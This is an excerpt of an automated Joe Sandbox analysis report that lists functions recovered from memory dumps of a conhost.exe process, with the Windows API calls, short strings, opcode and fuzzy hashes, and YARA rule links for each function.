Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8936a7dc1bbd2d748e49db142c25620c3457ccd0221bc93dfde4c61f3e78aa6d
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: EF02EB3621AB8486E7A0CB55F49935ABBA1F3C4794F108015EACE87BA8DF7CC494CF01

Function 00000286D7D12C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000286D7D12CAD
TlsGetValue.KERNEL32 ref: 00000286D7D12CBC
TlsGetValue.KERNEL32 ref: 00000286D7D12CCB
TlsSetValue.KERNEL32 ref: 00000286D7D12E0F
TlsSetValue.KERNEL32 ref: 00000286D7D12E1E
TlsSetValue.KERNEL32 ref: 00000286D7D12E2D

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: b0ba509dbb98700e6e887e91f6f59de4aac692a57d13ad9afcd96bd2be96a539
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 9F51D43A306A018BE764CF16F44CA5AB3A0F788B94F54C119DE5A43B58DF3AD945CB42

Function 00000286D7D12AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000286D7D12AE1
TlsGetValue.KERNEL32 ref: 00000286D7D12AF0
TlsGetValue.KERNEL32 ref: 00000286D7D12AFF
TlsSetValue.KERNEL32 ref: 00000286D7D12C3B
TlsSetValue.KERNEL32 ref: 00000286D7D12C4A
TlsSetValue.KERNEL32 ref: 00000286D7D12C59

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: b9621a9c596a872ef88ee11a8715c9348c210cd54e67b0156bd6da36791a59d9
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 2551C639316A4287E724CF16F84CA6AB7A1F789B84F50C119DE5A4375CDF3AD906CB01

Function 00000286D7D15E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000286D7D15E66

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: ca36e05741647b8c68efae5cd11fd7c248877a2a801e192f1ca8485f5dc85ffd
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 0B61777A62AB44C6E760CB15E45D31AB7A1F388754F509116FA8E47BA8DF7CC540CF02

Function 00000286D7D13EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13A5B), ref: 00000286D7D13F68

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 6681868e44065d9410fa468205e4fe76258d7dc5f80591eb99ee02aef7b08bf0
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 12114F2A70AB4093EF248B21E40D61AA7B0FB45B94F048126DE4D037A4EF7DC955C785

Function 00000286D7D18CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000286D7D18CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000286D7D18D62
RtlUnwindEx.NTDLL ref: 00000286D7D18DBC

Strings

csm, xrefs: 00000286D7D18D49

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: c468c18884cea41f942db7d7a4857fcd8af1b0dfbcd5f0bbacfa228b73f9871b
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: AF51AD3A313A208AEB54CF25E44CB6C7792F754BA8F69C125EE5A47788DF79C841C702

Function 00000286D7CE9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000286D7CE9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000286D7CE9FBC

Strings

csm, xrefs: 00000286D7CEA00E
csm, xrefs: 00000286D7CE9EF6

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: a8d5cd539f29786872f530d78bbe1d60acd068cb486baa63d498f813751f75cb
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 0F518E7A3062888EEB748F22954E36C77A0F755B94F14D116DA9A87BD5CF38C492CB03

Function 00000286D7D1A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000286D7D1A75B
_CallSETranslator.LIBVCRUNTIME ref: 00000286D7D1A7A7

Strings

MOC, xrefs: 00000286D7D1A76F
RCC, xrefs: 00000286D7D1A777

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 8feb0e1bb6eb2ce1acead81155ee0211bccc79812d5847773d063c6a10e126a8
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 50618C36609BC485EB218F15E44879AB7A0F785B98F448216EFD817B9ADF78C190CB01

Function 00000286D7D1AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000286D7D1AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000286D7D1ABBC

Strings

csm, xrefs: 00000286D7D1AAF6
csm, xrefs: 00000286D7D1AC0E

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ab00a8567207ba424e20d264e4dbf47a6d8adb7b6e7ba714a659471e1aaaba05
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: AB516A7A3067808BEB748F22964C3587BA2F394B94F14C116DE9947BD5CF38D8A1CB02

Function 00000286D7D13950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000286D7D13972
StrStrW.SHLWAPI ref: 00000286D7D13990
StrToIntW.SHLWAPI ref: 00000286D7D139B7

Part of subcall function 00000286D7D11A30: OpenProcess.KERNEL32 ref: 00000286D7D11A56
Part of subcall function 00000286D7D11A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000286D7D11A74
Part of subcall function 00000286D7D11A30: PathFindFileNameW.SHLWAPI ref: 00000286D7D11A83
Part of subcall function 00000286D7D11A30: lstrlenW.KERNEL32 ref: 00000286D7D11A8F
Part of subcall function 00000286D7D11A30: StrCpyW.SHLWAPI ref: 00000286D7D11AA2
Part of subcall function 00000286D7D11A30: CloseHandle.KERNEL32 ref: 00000286D7D11AB0

Part of subcall function 00000286D7D13F88: StrCmpNIW.SHLWAPI(?,?,?,00000286D7D1272F), ref: 00000286D7D13FA0

Strings

pid_, xrefs: 00000286D7D13968

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 7ba5da1e2ab4b16bee62ce66c2854284f8110ddfa3e860b53032039307f23cd3
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 9311B629316F8192FB209B75E90D35A67A4F784780F80C0259E49C36D4EF78CD06C741

Function 00000286D7D21FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000286D7D22027
WriteFile.KERNEL32 ref: 00000286D7D22304
WriteFile.KERNEL32 ref: 00000286D7D2234A
GetLastError.KERNEL32 ref: 00000286D7D22409

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: e6744d186ac7f78aceb1b30b267d0475328b1a677803dd5b8a4487992384edbf
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 89D1FF36716A8089E721CFA5D8487DC37B1F354B98F818216EE5EA7B99DE34D107C341

Function 00000286D7D114A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000286D7D114C6
HeapFree.KERNEL32 ref: 00000286D7D114D5
GetProcessHeap.KERNEL32 ref: 00000286D7D114E2
HeapFree.KERNEL32 ref: 00000286D7D114F1
GetProcessHeap.KERNEL32 ref: 00000286D7D11501

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 0adb82a042643104f8ecc05cec9cadd47a18e52efd281ef19bf7e8549e498bc5
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: B501653A712B80DAE725DF66E80D65977A0F788F84B098065DF4A43728EF38D092C740

Function 00000286D7D228F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000286D7D228DF), ref: 00000286D7D22A12

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: dba762219fd8ce12d82f81b9d3d125fe3775f202ff765f858fba3b94eb4a622d
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 4491113A71265089FB708F65985C3AD3BA0F358B98F958106EE4A67A8DDF34D487C302

Function 00000286D7D18090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000286D7D180BC
GetCurrentThreadId.KERNEL32 ref: 00000286D7D180CA
GetCurrentProcessId.KERNEL32 ref: 00000286D7D180D6
QueryPerformanceCounter.KERNEL32 ref: 00000286D7D180E6

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: c8629393f6991ed1c3faba27eb96233f44035f8aec5c4019c49e82440b41536b
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 34115B2A712F048AEB10CF60E85D3A833A4F719768F840E21EE6E967A4DF78C195C341

Function 00000286D7D127E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000286D7D128CC
StrCpyW.SHLWAPI ref: 00000286D7D128E5

Part of subcall function 00000286D7D13F88: StrCmpNIW.SHLWAPI(?,?,?,00000286D7D1272F), ref: 00000286D7D13FA0

Strings

\\.\pipe\, xrefs: 00000286D7D128D7

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 3e6d6f8620ac9ccc62722c743387132ed9c16cf4fc16beed7a9a7b48bedd55ed
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 6371B03A341B8242EB74DF2A995C3EA6794F385BD4F448016DD4A53B8CDE36DA01C741

Function 00000286D7CE80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000286D7CE80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000286D7CE8162

Strings

csm, xrefs: 00000286D7CE8149

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 93e3f10bdc43480d713e4d43ec452c9589eb041de5fb6d73aa1e7f05e05d18f5
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: C551DF3A313A688EEB64CF15E44DB6C73E5E344B98F55D125EA6A83788DF78C842C701

Function 00000286D7CE9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000286D7CE9BA7

Strings

MOC, xrefs: 00000286D7CE9B6F
RCC, xrefs: 00000286D7CE9B77

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: e883bdd8a5e3e52a1983a9689339df62c2d5d695a13d1024315a180defb669ea
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: A561C136609BC889EB309F15E4497DAB7A0F785B98F048215EF9847B99DF78C191CB02

Function 00000286D7D125DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000286D7D126C2
StrCpyW.SHLWAPI ref: 00000286D7D126D9

Strings

\\.\pipe\, xrefs: 00000286D7D126CD

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 7105e8a5152630e359f37512163824fc5bb7923ccc734ab9b5f8a72ef0f0a05d
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 5C51146E30A78191EA34DE3AB45C3AB6B91F385B90F448025DE9943B8DDE3BD805C742

Function 00000286D7D22660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000286D7D22778
GetLastError.KERNEL32 ref: 00000286D7D2279D

Strings

U, xrefs: 00000286D7D22722

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 3e7e8d6d1a6e632f5065a09dca104f8f9b5929b1dce5b56eb93c535d01b326a8
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 4341F777726A8086E720DF25E44C79AB7A0F398794F958121FE8D87758EF38D442CB41

Function 00000286D7D19178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

